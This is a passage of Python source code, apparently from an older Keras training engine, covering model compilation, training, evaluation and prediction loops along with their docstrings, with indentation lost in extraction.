sample_weights.append(weight)
else:
for i, name in enumerate(self.output_names):
if i in skip_indices:
sample_weight_modes.append(None)
sample_weights.append(None)
else:
if sample_weight_mode == 'temporal':
sample_weights.append(
K.placeholder(ndim=2,
name=name + '_sample_weights'))
sample_weight_modes.append('temporal')
else:
sample_weights.append(
K.placeholder(ndim=1,
name=name + '_sample_weights'))
sample_weight_modes.append(None)
self.sample_weight_modes = sample_weight_modes
self._feed_sample_weight_modes = []
for i in range(len(self.outputs)):
if i not in skip_indices:
self._feed_sample_weight_modes.append(self.sample_weight_modes[i])
# Prepare targets of model.
self.targets = []
self._feed_targets = []
for i in range(len(self.outputs)):
if i in skip_indices:
self.targets.append(None)
else:
shape = self.internal_output_shapes[i]
name = self.output_names[i]
target = K.placeholder(ndim=len(shape),
name=name + '_target',
sparse=K.is_sparse(self.outputs[i]),
dtype=K.dtype(self.outputs[i]))
self.targets.append(target)
self._feed_targets.append(target)
# Prepare metrics.
self.metrics = metrics
self.metrics_names = ['loss']
self.metrics_tensors = []
# Compute total loss.
total_loss = None
for i in range(len(self.outputs)):
if i in skip_indices:
continue
y_true = self.targets[i]
y_pred = self.outputs[i]
weighted_loss = weighted_losses[i]
sample_weight = sample_weights[i]
mask = masks[i]
loss_weight = loss_weights_list[i]
output_loss = weighted_loss(y_true, y_pred,
sample_weight, mask)
if len(self.outputs) > 1:
self.metrics_tensors.append(output_loss)
self.metrics_names.append(self.output_names[i] + '_loss')
if total_loss is None:
total_loss = loss_weight * output_loss
else:
total_loss += loss_weight * output_loss
if total_loss is None:
if not self.losses:
raise RuntimeError('The model cannot be compiled '
'because it has no loss to optimize.')
else:
total_loss = 0.
# Add regularization penalties
# and other layer-specific losses.
for loss_tensor in self.losses:
total_loss += loss_tensor
# List of same size as output_names.
# contains tuples (metrics for output, names of metrics).
nested_metrics = _collect_metrics(metrics, self.output_names)
def append_metric(layer_num, metric_name, metric_tensor):
"""Helper function used in loop below."""
if len(self.output_names) > 1:
metric_name = self.output_layers[layer_num].name + '_' + metric_name
self.metrics_names.append(metric_name)
self.metrics_tensors.append(metric_tensor)
for i in range(len(self.outputs)):
if i in skip_indices:
continue
y_true = self.targets[i]
y_pred = self.outputs[i]
output_metrics = nested_metrics[i]
for metric in output_metrics:
if metric == 'accuracy' or metric == 'acc':
# custom handling of accuracy
# (because of class mode duality)
output_shape = self.internal_output_shapes[i]
acc_fn = None
if (output_shape[-1] == 1 or
self.loss_functions[i] == losses.binary_crossentropy):
# case: binary accuracy
acc_fn = metrics_module.binary_accuracy
elif self.loss_functions[i] == losses.sparse_categorical_crossentropy:
# case: categorical accuracy with sparse targets
acc_fn = metrics_module.sparse_categorical_accuracy
else:
acc_fn = metrics_module.categorical_accuracy
masked_fn = _masked_objective(acc_fn)
append_metric(i, 'acc', masked_fn(y_true, y_pred, mask=masks[i]))
else:
metric_fn = metrics_module.get(metric)
masked_metric_fn = _masked_objective(metric_fn)
metric_result = masked_metric_fn(y_true, y_pred, mask=masks[i])
metric_result = {
metric_fn.__name__: metric_result
}
for name, tensor in six.iteritems(metric_result):
append_metric(i, name, tensor)
# Prepare gradient updates and state updates.
self.total_loss = total_loss
self.sample_weights = sample_weights
self._feed_sample_weights = []
for i in range(len(self.sample_weights)):
if i not in skip_indices:
self._feed_sample_weights.append(sample_weights[i])
# Functions for train, test and predict will
# be compiled lazily when required.
# This saves time when the user is not using all functions.
self._function_kwargs = kwargs
self.train_function = None
self.test_function = None
self.predict_function = None
# Collected trainable weights and sort them deterministically.
trainable_weights = self.trainable_weights
# Sort weights by name.
if trainable_weights:
if K.backend() == 'theano':
trainable_weights.sort(key=lambda x: x.name if x.name else x.auto_name)
else:
trainable_weights.sort(key=lambda x: x.name)
self._collected_trainable_weights = trainable_weights
def _make_train_function(self):
if not hasattr(self, 'train_function'):
raise RuntimeError('You must compile your model before using it.')
if self.train_function is None:
inputs = self._feed_inputs + self._feed_targets + self._feed_sample_weights
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
inputs += [K.learning_phase()]
training_updates = self.optimizer.get_updates(
self._collected_trainable_weights,
self.constraints,
self.total_loss)
updates = self.updates + training_updates
# Gets loss and metrics. Updates weights at each call.
self.train_function = K.function(inputs,
[self.total_loss] + self.metrics_tensors,
updates=updates,
name='train_function',
**self._function_kwargs)
def _make_test_function(self):
if not hasattr(self, 'test_function'):
raise RuntimeError('You must compile your model before using it.')
if self.test_function is None:
inputs = self._feed_inputs + self._feed_targets + self._feed_sample_weights
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
inputs += [K.learning_phase()]
# Return loss and metrics, no gradient updates.
# Does update the network states.
self.test_function = K.function(inputs,
[self.total_loss] + self.metrics_tensors,
updates=self.state_updates,
name='test_function',
**self._function_kwargs)
def _make_predict_function(self):
if not hasattr(self, 'predict_function'):
self.predict_function = None
if self.predict_function is None:
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
inputs = self._feed_inputs + [K.learning_phase()]
else:
inputs = self._feed_inputs
# Gets network outputs. Does not update weights.
# Does update the network states.
kwargs = getattr(self, '_function_kwargs', {})
self.predict_function = K.function(inputs,
self.outputs,
updates=self.state_updates,
name='predict_function',
**kwargs)
def _fit_loop(self, f, ins, out_labels=None, batch_size=32,
epochs=100, verbose=1, callbacks=None,
val_f=None, val_ins=None, shuffle=True,
callback_metrics=None, initial_epoch=0):
"""Abstract fit function for `f(ins)`.
Assume that f returns a list, labeled by out_labels.
# Arguments
f: Keras function returning a list of tensors
ins: list of tensors to be fed to `f`
out_labels: list of strings, display names of
the outputs of `f`
batch_size: integer batch size
epochs: number of times to iterate over the data
verbose: verbosity mode, 0, 1 or 2
callbacks: list of callbacks to be called during training
val_f: Keras function to call for validation
val_ins: list of tensors to be fed to `val_f`
shuffle: whether to shuffle the data at the beginning of each epoch
callback_metrics: list of strings, the display names of the metrics
passed to the callbacks. They should be the
concatenation of list the display names of the outputs of
`f` and the list of display names of the outputs of `f_val`.
initial_epoch: epoch at which to start training
(useful for resuming a previous training run)
# Returns
`History` object.
"""
do_validation = False
if val_f and val_ins:
do_validation = True
if verbose:
print('Train on %d samples, validate on %d samples' %
(ins[0].shape[0], val_ins[0].shape[0]))
if ins and hasattr(ins[0], 'shape'):
num_train_samples = ins[0].shape[0]
else:
# May happen if we are running `fit` without Numpy input data,
# i.e. if all inputs to the models are data tensors
# instead of placeholders.
# In that case we will run `fit` over a single batch.
num_train_samples = batch_size
verbose = 2
index_array = np.arange(num_train_samples)
self.history = cbks.History()
callbacks = [cbks.BaseLogger()] + (callbacks or []) + [self.history]
if verbose:
callbacks += [cbks.ProgbarLogger()]
callbacks = cbks.CallbackList(callbacks)
out_labels = out_labels or []
# it's possible to callback a different model than self
# (used by Sequential models)
if hasattr(self, 'callback_model') and self.callback_model:
callback_model = self.callback_model
else:
callback_model = self
callbacks.set_model(callback_model)
callbacks.set_params({
'batch_size': batch_size,
'epochs': epochs,
'samples': num_train_samples,
'verbose': verbose,
'do_validation': do_validation,
'metrics': callback_metrics or [],
})
callbacks.on_train_begin()
callback_model.stop_training = False
for cbk in callbacks:
cbk.validation_data = val_ins
for epoch in range(initial_epoch, epochs):
callbacks.on_epoch_begin(epoch)
if shuffle == 'batch':
index_array = _batch_shuffle(index_array, batch_size)
elif shuffle:
np.random.shuffle(index_array)
batches = _make_batches(num_train_samples, batch_size)
epoch_logs = {}
for batch_index, (batch_start, batch_end) in enumerate(batches):
batch_ids = index_array[batch_start:batch_end]
try:
if isinstance(ins[-1], float):
# Do not slice the training phase flag.
ins_batch = _slice_arrays(ins[:-1], batch_ids) + [ins[-1]]
else:
ins_batch = _slice_arrays(ins, batch_ids)
except TypeError:
raise TypeError('TypeError while preparing batch. '
'If using HDF5 input data, '
'pass shuffle="batch".')
batch_logs = {}
batch_logs['batch'] = batch_index
batch_logs['size'] = len(batch_ids)
callbacks.on_batch_begin(batch_index, batch_logs)
outs = f(ins_batch)
if not isinstance(outs, list):
outs = [outs]
for l, o in zip(out_labels, outs):
batch_logs[l] = o
callbacks.on_batch_end(batch_index, batch_logs)
if callback_model.stop_training:
break
if batch_index == len(batches) - 1: # Last batch.
if do_validation:
val_outs = self._test_loop(val_f, val_ins,
batch_size=batch_size,
verbose=0)
if not isinstance(val_outs, list):
val_outs = [val_outs]
# Same labels assumed.
for l, o in zip(out_labels, val_outs):
epoch_logs['val_' + l] = o
callbacks.on_epoch_end(epoch, epoch_logs)
if callback_model.stop_training:
break
callbacks.on_train_end()
return self.history
def _predict_loop(self, f, ins, batch_size=32, verbose=0):
"""Abstract method to loop over some data in batches.
# Arguments
f: Keras function returning a list of tensors.
ins: list of tensors to be fed to `f`.
batch_size: integer batch size.
verbose: verbosity mode.
# Returns
Array of predictions (if the model has a single output)
or list of arrays of predictions
(if the model has multiple outputs).
"""
if ins and hasattr(ins[0], 'shape'):
samples = ins[0].shape[0]
else:
# May happen if we are running `predict` without Numpy input data,
# i.e. if all inputs to the models are data tensors
# instead of placeholders.
# In that case we will run `predict` over a single batch.
samples = batch_size
verbose = 2
outs = []
if verbose == 1:
progbar = Progbar(target=samples)
batches = _make_batches(samples, batch_size)
index_array = np.arange(samples)
for batch_index, (batch_start, batch_end) in enumerate(batches):
batch_ids = index_array[batch_start:batch_end]
if ins and isinstance(ins[-1], float):
# Do not slice the training phase flag.
ins_batch = _slice_arrays(ins[:-1], batch_ids) + [ins[-1]]
else:
ins_batch = _slice_arrays(ins, batch_ids)
batch_outs = f(ins_batch)
if not isinstance(batch_outs, list):
batch_outs = [batch_outs]
if batch_index == 0:
for batch_out in batch_outs:
shape = (samples,) + batch_out.shape[1:]
outs.append(np.zeros(shape, dtype=batch_out.dtype))
for i, batch_out in enumerate(batch_outs):
outs[i][batch_start:batch_end] = batch_out
if verbose == 1:
progbar.update(batch_end)
if len(outs) == 1:
return outs[0]
return outs
def _test_loop(self, f, ins, batch_size=32, verbose=0):
"""Abstract method to loop over some data in batches.
# Arguments
f: Keras function returning a list of tensors.
ins: list of tensors to be fed to `f`.
batch_size: integer batch size.
verbose: verbosity mode.
# Returns
Scalar loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
"""
if ins and hasattr(ins[0], 'shape'):
samples = ins[0].shape[0]
else:
# May happen if we are running `evaluate` without Numpy input data,
# i.e. if all inputs to the models are data tensors
# instead of placeholders.
# In that case we will run `evaluate` over a single batch.
samples = batch_size
verbose = 2
outs = []
if verbose == 1:
progbar = Progbar(target=samples)
batches = _make_batches(samples, batch_size)
index_array = np.arange(samples)
for batch_index, (batch_start, batch_end) in enumerate(batches):
batch_ids = index_array[batch_start:batch_end]
if isinstance(ins[-1], float):
# Do not slice the training phase flag.
ins_batch = _slice_arrays(ins[:-1], batch_ids) + [ins[-1]]
else:
ins_batch = _slice_arrays(ins, batch_ids)
batch_outs = f(ins_batch)
if isinstance(batch_outs, list):
if batch_index == 0:
for batch_out in enumerate(batch_outs):
outs.append(0.)
for i, batch_out in enumerate(batch_outs):
outs[i] += batch_out * len(batch_ids)
else:
if batch_index == 0:
outs.append(0.)
outs[0] += batch_outs * len(batch_ids)
if verbose == 1:
progbar.update(batch_end)
for i in range(len(outs)):
outs[i] /= samples
if len(outs) == 1:
return outs[0]
return outs
def _standardize_user_data(self, x, y,
sample_weight=None, class_weight=None,
check_batch_axis=True, batch_size=None):
if not hasattr(self, 'optimizer'):
raise RuntimeError('You must compile a model before '
'training/testing. '
'Use `model.compile(optimizer, loss)`.')
output_shapes = []
for output_shape, loss_fn in zip(self._feed_output_shapes, self._feed_loss_fns):
if loss_fn.__name__ == 'sparse_categorical_crossentropy':
output_shapes.append(output_shape[:-1] + (1,))
elif getattr(losses, loss_fn.__name__, None) is None:
output_shapes.append(None)
else:
output_shapes.append(output_shape)
x = _standardize_input_data(x, self._feed_input_names,
self._feed_input_shapes,
check_batch_axis=False,
exception_prefix='input')
y = _standardize_input_data(y, self._feed_output_names,
output_shapes,
check_batch_axis=False,
exception_prefix='target')
sample_weights = _standardize_sample_weights(sample_weight,
self._feed_output_names)
class_weights = _standardize_class_weights(class_weight,
self._feed_output_names)
sample_weights = [_standardize_weights(ref, sw, cw, mode)
for (ref, sw, cw, mode)
in zip(y, sample_weights, class_weights, self._feed_sample_weight_modes)]
_check_array_lengths(x, y, sample_weights)
_check_loss_and_target_compatibility(y,
self._feed_loss_fns,
self._feed_output_shapes)
if self.stateful and batch_size:
if x[0].shape[0] % batch_size != 0:
raise ValueError('In a stateful network, '
'you should only pass inputs with '
'a number of samples that can be '
'divided by the batch size. Found: ' +
str(x[0].shape[0]) + ' samples')
return x, y, sample_weights
def _get_deduped_metrics_names(self):
out_labels = self.metrics_names
# Rename duplicated metrics name
# (can happen with an output layer shared among multiple dataflows).
deduped_out_labels = []
for i, label in enumerate(out_labels):
new_label = label
if out_labels.count(label) > 1:
dup_idx = out_labels[:i].count(label)
new_label += '_' + str(dup_idx + 1)
deduped_out_labels.append(new_label)
return deduped_out_labels
def fit(self, x=None,
y=None,
batch_size=32,
epochs=1,
verbose=1,
callbacks=None,
validation_split=0.,
validation_data=None,
shuffle=True,
class_weight=None,
sample_weight=None,
initial_epoch=0,
**kwargs):
"""Trains the model for a fixed number of epochs (iterations on a dataset).
# Arguments
x: Numpy array of training data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named,
you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named,
you can also pass a dictionary
mapping output names to Numpy arrays.
batch_size: integer. Number of samples per gradient update.
epochs: integer, the number of times to iterate
over the training data arrays.
verbose: 0, 1, or 2. Verbosity mode.
0 = silent, 1 = verbose, 2 = one log line per epoch.
callbacks: list of callbacks to be called during training.
See [callbacks](/callbacks).
validation_split: float between 0 and 1:
fraction of the training data to be used as validation data.
The model will set apart this fraction of the training data,
will not train on it, and will evaluate
the loss and any model metrics
on this data at the end of each epoch.
validation_data: data on which to evaluate
the loss and any model metrics
at the end of each epoch. The model will not
be trained on this data.
This could be a tuple (x_val, y_val)
or a tuple (x_val, y_val, val_sample_weights).
shuffle: boolean, whether to shuffle the training data
before each epoch.
class_weight: optional dictionary mapping
class indices (integers) to
a weight (float) to apply to the model's loss for the samples
from this class during training.
This can be useful to tell the model to "pay more attention" to
samples from an under-represented class.
sample_weight: optional array of the same length as x, containing
weights to apply to the model's loss for each sample.
In the case of temporal data, you can pass a 2D array
with shape (samples, sequence_length),
to apply a different weight to every timestep of every sample.
In this case you should make sure to specify
sample_weight_mode="temporal" in compile().
initial_epoch: epoch at which to start training
(useful for resuming a previous training run)
# Returns
A `History` instance. Its `history` attribute contains
all information collected during training.
# Raises
ValueError: In case of mismatch between the provided input data
and what the model expects.
"""
# Legacy support
if 'nb_epoch' in kwargs:
warnings.warn('The `nb_epoch` argument in `fit` '
'has been renamed `epochs`.', stacklevel=2)
epochs = kwargs.pop('nb_epoch')
if kwargs:
raise TypeError('Unrecognized keyword arguments: ' + str(kwargs))
# Validate user data.
x, y, sample_weights = self._standardize_user_data(
x, y,
sample_weight=sample_weight,
class_weight=class_weight,
check_batch_axis=False,
batch_size=batch_size)
# Prepare validation data.
if validation_data:
do_validation = True
if len(validation_data) == 2:
val_x, val_y = validation_data
val_sample_weight = None
elif len(validation_data) == 3:
val_x, val_y, val_sample_weight = validation_data
else:
raise ValueError('When passing validation_data, '
'it must contain 2 (x_val, y_val) '
'or 3 (x_val, y_val, val_sample_weights) '
'items, however it contains %d items' %
len(validation_data))
val_x, val_y, val_sample_weights = self._standardize_user_data(
val_x, val_y,
sample_weight=val_sample_weight,
check_batch_axis=False,
batch_size=batch_size)
self._make_test_function()
val_f = self.test_function
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
val_ins = val_x + val_y + val_sample_weights + [0.]
else:
val_ins = val_x + val_y + val_sample_weights
elif validation_split and 0. < validation_split < 1.:
do_validation = True
split_at = int(len(x[0]) * (1. - validation_split))
x, val_x = (_slice_arrays(x, 0, split_at), _slice_arrays(x, split_at))
y, val_y = (_slice_arrays(y, 0, split_at), _slice_arrays(y, split_at))
sample_weights, val_sample_weights = (
_slice_arrays(sample_weights, 0, split_at),
_slice_arrays(sample_weights, split_at))
self._make_test_function()
val_f = self.test_function
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
val_ins = val_x + val_y + val_sample_weights + [0.]
else:
val_ins = val_x + val_y + val_sample_weights
else:
do_validation = False
val_f = None
val_ins = None
# Prepare input arrays and training function.
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
ins = x + y + sample_weights + [1.]
else:
ins = x + y + sample_weights
self._make_train_function()
f = self.train_function
# Prepare display labels.
out_labels = self._get_deduped_metrics_names()
if do_validation:
callback_metrics = copy.copy(out_labels) + ['val_' + n for n in out_labels]
else:
callback_metrics = copy.copy(out_labels)
# Delegate logic to `_fit_loop`.
return self._fit_loop(f, ins, out_labels=out_labels,
batch_size=batch_size, epochs=epochs,
verbose=verbose, callbacks=callbacks,
val_f=val_f, val_ins=val_ins, shuffle=shuffle,
callback_metrics=callback_metrics,
initial_epoch=initial_epoch)
def evaluate(self, x, y, batch_size=32, verbose=1, sample_weight=None):
"""Returns the loss value & metrics values for the model in test mode.
Computation is done in batches.
# Arguments
x: Numpy array of test data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named,
you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named,
you can also pass a dictionary
mapping output names to Numpy arrays.
batch_size: integer. Number of samples per gradient update.
verbose: verbosity mode, 0 or 1.
sample_weight: Array of weights to weight the contribution
of different samples to the loss and metrics.
# Returns
Scalar test loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
"""
# Validate user data.
x, y, sample_weights = self._standardize_user_data(
x, y,
sample_weight=sample_weight,
check_batch_axis=False,
batch_size=batch_size)
# Prepare inputs, delegate logic to `_test_loop`.
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
ins = x + y + sample_weights + [0.]
else:
ins = x + y + sample_weights
self._make_test_function()
f = self.test_function
return self._test_loop(f, ins,
batch_size=batch_size,
verbose=verbose)
def predict(self, x, batch_size=32, verbose=0):
"""Generates output predictions for the input samples.
Computation is done in batches.
# Arguments
x: the input data, as a Numpy array
(or list of Numpy arrays if the model has multiple outputs).
batch_size: integer.
verbose: verbosity mode, 0 or 1.
# Returns
Numpy array(s) of predictions.
# Raises
ValueError: In case of mismatch between the provided
input data and the model's expectations,
or in case a stateful model receives a number of samples
that is not a multiple of the batch size.
"""
# Validate user data.
x = _standardize_input_data(x, self._feed_input_names,
self._feed_input_shapes,
check_batch_axis=False)
if self.stateful:
if x[0].shape[0] > batch_size and x[0].shape[0] % batch_size != 0:
raise ValueError('In a stateful network, '
'you should only pass inputs with '
'a number of samples that can be '
'divided by the batch size. Found: ' +
str(x[0].shape[0]) + ' samples. '
'Batch size: ' + str(batch_size) + '.')
# Prepare inputs, delegate logic to `_predict_loop`.
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
ins = x + [0.]
else:
ins = x
self._make_predict_function()
f = self.predict_function
return self._predict_loop(f, ins,
batch_size=batch_size, verbose=verbose)
def train_on_batch(self, x, y,
sample_weight=None, class_weight=None):
"""Runs a single gradient update on a single batch of data.
# Arguments
x: Numpy array of training data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named,
you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named,
you can also pass a dictionary
mapping output names to Numpy arrays.
sample_weight: optional array of the same length as x, containing
weights to apply to the model's loss for each sample.
In the case of temporal data, you can pass a 2D array
with shape (samples, sequence_length),
to apply a different weight to every timestep of every sample.
In this case you should make sure to specify
sample_weight_mode="temporal" in compile().
class_weight: optional dictionary mapping
class indices (integers) to
a weight (float) to apply to the model's loss for the samples
from this class during training.
This can be useful to tell the model to "pay more attention" to
samples from an under-represented class.
# Returns
Scalar training loss
(if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
"""
x, y, sample_weights = self._standardize_user_data(
x, y,
sample_weight=sample_weight,
class_weight=class_weight,
check_batch_axis=True)
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
ins = x + y + sample_weights + [1.]
else:
ins = x + y + sample_weights
self._make_train_function()
outputs = self.train_function(ins)
if len(outputs) == 1:
return outputs[0]
return outputs
def test_on_batch(self, x, y, sample_weight=None):
"""Test the model on a single batch of samples.
# Arguments
x: Numpy array of test data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named,
you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named,
you can also pass a dictionary
mapping output names to Numpy arrays.
sample_weight: optional array of the same length as x, containing
weights to apply to the model's loss for each sample.
In the case of temporal data, you can pass a 2D array
with shape (samples, sequence_length),
to apply a different weight to every timestep of every sample.
In this case you should make sure to specify
sample_weight_mode="temporal" in compile().
# Returns
Scalar test loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
"""
x, y, sample_weights = self._standardize_user_data(
x, y,
sample_weight=sample_weight,
check_batch_axis=True)
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
ins = x + y + sample_weights + [0.]
else:
ins = x + y + sample_weights
self._make_test_function()
outputs = self.test_function(ins)
if len(outputs) == 1:
return outputs[0]
return outputs
def predict_on_batch(self, x):
"""Returns predictions for a single batch of samples.
# Arguments
x: Input samples, as a Numpy array.
# Returns
Numpy array(s) of predictions.
"""
x = _standardize_input_data(x, self._feed_input_names,
self._feed_input_shapes)
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
ins = x + [0.]
else:
ins = x
self._make_predict_function()
outputs = self.predict_function(ins)
if len(outputs) == 1:
return outputs[0]
return outputs
@interfaces.legacy_generator_methods_support
def fit_generator(self, generator,
steps_per_epoch,
epochs=1,
verbose=1,
callbacks=None,
validation_data=None,
validation_steps=None,
class_weight=None,
max_q_size=10,
workers=1,
pickle_safe=False,
initial_epoch=0):
"""Fits the model on data yielded batch-by-batch by a Python generator.
The generator is run in parallel to the model, for efficiency.
For instance, this allows you to do real-time data augmentation
on images on CPU in parallel to training your model on GPU.
# Arguments
generator: a generator.
The output of the generator must be either
- a tuple (inputs, targets)
- a tuple (inputs, targets, sample_weights).
All arrays should contain the same number of samples.
The generator is expected to loop over its data
indefinitely. An epoch finishes when `steps_per_epoch`
batches have been seen by the model.
steps_per_epoch: Total number of steps (batches of samples)
to yield from `generator` before declaring one epoch
finished and starting the next epoch. It should typically
be equal to the number of unique samples if your dataset
divided by the batch size.
epochs: integer, total number of iterations on the data.
verbose: verbosity mode, 0, 1, or 2.
callbacks: list of callbacks to be called during training.
validation_data: this can be either
- a generator for the validation data
- a tuple (inputs, targets)
- a tuple (inputs, targets, sample_weights).
validation_steps: Only relevant if `validation_data`
is a generator. Total number of steps (batches of samples)
to yield from `generator` before stopping.
class_weight: dictionary mapping class indices to a weight
for the class.
max_q_size: maximum size for the generator queue
workers: maximum number of processes to spin up
when using process based threading
pickle_safe: if True, use process based threading.
Note that because
this implementation relies on multiprocessing,
you should not pass
non picklable arguments to the generator
as they can't be passed
easily to children processes.
initial_epoch: epoch at which to start training
(useful for resuming a previous training run)
# Returns
A `History` object.
# Example
```python
def generate_arrays_from_file(path):
while 1:
f = open(path)
for line in f:
# create numpy arrays of input data
# and labels, from each line in the file
x1, x2, y = process_line(line)
yield ({'input_1': x1, 'input_2': x2}, {'output': y})
f.close()
model.fit_generator(generate_arrays_from_file('/my_file.txt'),
steps_per_epoch=10000, epochs=10)
```
# Raises
ValueError: In case the generator yields
data in an invalid format.
"""
wait_time = 0.01 # in seconds
epoch = initial_epoch
do_validation = bool(validation_data)
self._make_train_function()
if do_validation:
self._make_test_function()
# python 2 has 'next', 3 has '__next__'
# avoid any explicit version checks
val_gen = (hasattr(validation_data, 'next') or
hasattr(validation_data, '__next__'))
if val_gen and not validation_steps:
raise ValueError('When using a generator for validation data, '
'you must specify a value for '
'`validation_steps`.')
# Prepare display labels.
out_labels = self._get_deduped_metrics_names()
callback_metrics = out_labels + ['val_' + n for n in out_labels]
# prepare callbacks
self.history = cbks.History()
callbacks = [cbks.BaseLogger()] + (callbacks or []) + [self.history]
if verbose:
callbacks += [cbks.ProgbarLogger(count_mode='steps')]
callbacks = cbks.CallbackList(callbacks)
# it's possible to callback a different model than self:
if hasattr(self, 'callback_model') and self.callback_model:
callback_model = self.callback_model
else:
callback_model = self
callbacks.set_model(callback_model)
callbacks.set_params({
'epochs': epochs,
'steps': steps_per_epoch,
'verbose': verbose,
'do_validation': do_validation,
'metrics': callback_metrics,
})
callbacks.on_train_begin()
if do_validation and not val_gen:
if len(validation_data) == 2:
val_x, val_y = validation_data
val_sample_weight = None
elif len(validation_data) == 3:
val_x, val_y, val_sample_weight = validation_data
else:
raise ValueError('validation_data should be a tuple '
'`(val_x, val_y, val_sample_weight)` '
'or `(val_x, val_y)`. Found: ' +
str(validation_data))
val_x, val_y, val_sample_weights = self._standardize_user_data(
val_x, val_y, val_sample_weight)
val_data = val_x + val_y + val_sample_weights
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
val_data += [0.]
for cbk in callbacks:
cbk.validation_data = val_data
enqueuer = None
try:
enqueuer = GeneratorEnqueuer(generator, pickle_safe=pickle_safe)
enqueuer.start(max_q_size=max_q_size, workers=workers)
callback_model.stop_training = False
while epoch < epochs:
callbacks.on_epoch_begin(epoch)
steps_done = 0
batch_index = 0
while steps_done < steps_per_epoch:
generator_output = None
while enqueuer.is_running():
if not enqueuer.queue.empty():
generator_output = enqueuer.queue.get()
break
else:
time.sleep(wait_time)
if not hasattr(generator_output, '__len__'):
raise ValueError('output of generator should be '
'a tuple `(x, y, sample_weight)` '
'or `(x, y)`. Found: ' +
str(generator_output))
if len(generator_output) == 2:
x, y = generator_output
sample_weight = None
elif len(generator_output) == 3:
x, y, sample_weight = generator_output
else:
raise ValueError('output of generator should be '
'a tuple `(x, y, sample_weight)` '
'or `(x, y)`. Found: ' +
str(generator_output))
# build batch logs
batch_logs = {}
if isinstance(x, list):
batch_size = x[0].shape[0]
elif isinstance(x, dict):
batch_size = list(x.values())[0].shape[0]
else:
batch_size = x.shape[0]
batch_logs['batch'] = batch_index
batch_logs['size'] = batch_size
callbacks.on_batch_begin(batch_index, batch_logs)
outs = self.train_on_batch(x, y,
sample_weight=sample_weight,
class_weight=class_weight)
if not isinstance(outs, list):
outs = [outs]
for l, o in zip(out_labels, outs):
batch_logs[l] = o
callbacks.on_batch_end(batch_index, batch_logs)
# Construct epoch logs.
epoch_logs = {}
batch_index += 1
steps_done += 1
# Epoch finished.
if steps_done >= steps_per_epoch and do_validation:
if val_gen:
val_outs = self.evaluate_generator(
validation_data,
validation_steps,
max_q_size=max_q_size,
workers=workers,
pickle_safe=pickle_safe)
else:
# No need for try/except because
# data has already been validated.
val_outs = self.evaluate(
val_x, val_y,
batch_size=batch_size,
sample_weight=val_sample_weights,
verbose=0)
if not isinstance(val_outs, list):
val_outs = [val_outs]
# Same labels assumed.
for l, o in zip(out_labels, val_outs):
epoch_logs['val_' + l] = o
callbacks.on_epoch_end(epoch, epoch_logs)
epoch += 1
if callback_model.stop_training:
break
finally:
if enqueuer is not None:
enqueuer.stop()
callbacks.on_train_end()
return self.history
@interfaces.legacy_generator_methods_support
def evaluate_generator(self, generator, steps,
max_q_size=10, workers=1, pickle_safe=False):
"""Evaluates the model on a data generator.
The generator should return the same kind of data
as accepted by `test_on_batch`.
# Arguments
generator: Generator yielding tuples (inputs, targets)
or (inputs, targets, sample_weights)
steps: Total number of steps (batches of samples)
to yield from `generator` before stopping.
max_q_size: maximum size for the generator queue
workers: maximum number of processes to spin up
when using process based threading
pickle_safe: if True, use process based threading.
Note that because
this implementation relies on multiprocessing,
you should not pass
non picklable arguments to the generator
as they can't be passed
easily to children processes.
# Returns
Scalar test loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
# Raises
ValueError: In case the generator yields
data in an invalid format.
"""
self._make_test_function()
steps_done = 0
wait_time = 0.01
all_outs = []
batch_sizes = []
enqueuer = None
try:
enqueuer = GeneratorEnqueuer(generator, pickle_safe=pickle_safe)
enqueuer.start(workers=workers, max_q_size=max_q_size)
while steps_done < steps:
generator_output = None
while enqueuer.is_running():
if not enqueuer.queue.empty():
generator_output = enqueuer.queue.get()
break
else:
time.sleep(wait_time)
if not hasattr(generator_output, '__len__'):
raise ValueError('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' +
str(generator_output))
if len(generator_output) == 2:
x, y = generator_output
sample_weight = None
elif len(generator_output) == 3:
x, y, sample_weight = generator_output
else:
raise ValueError('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' +
str(generator_output))
outs = self.test_on_batch(x, y, sample_weight=sample_weight)
if isinstance(x, list):
batch_size = len(x[0])
elif isinstance(x, dict):
batch_size = len(list(x.values())[0])
else:
batch_size = len(x)
all_outs.append(outs)
steps_done += 1
batch_sizes.append(batch_size)
finally:
if enqueuer is not None:
enqueuer.stop()
if not isinstance(outs, list):
return np.average(np.asarray(all_outs),
weights=batch_sizes)
else:
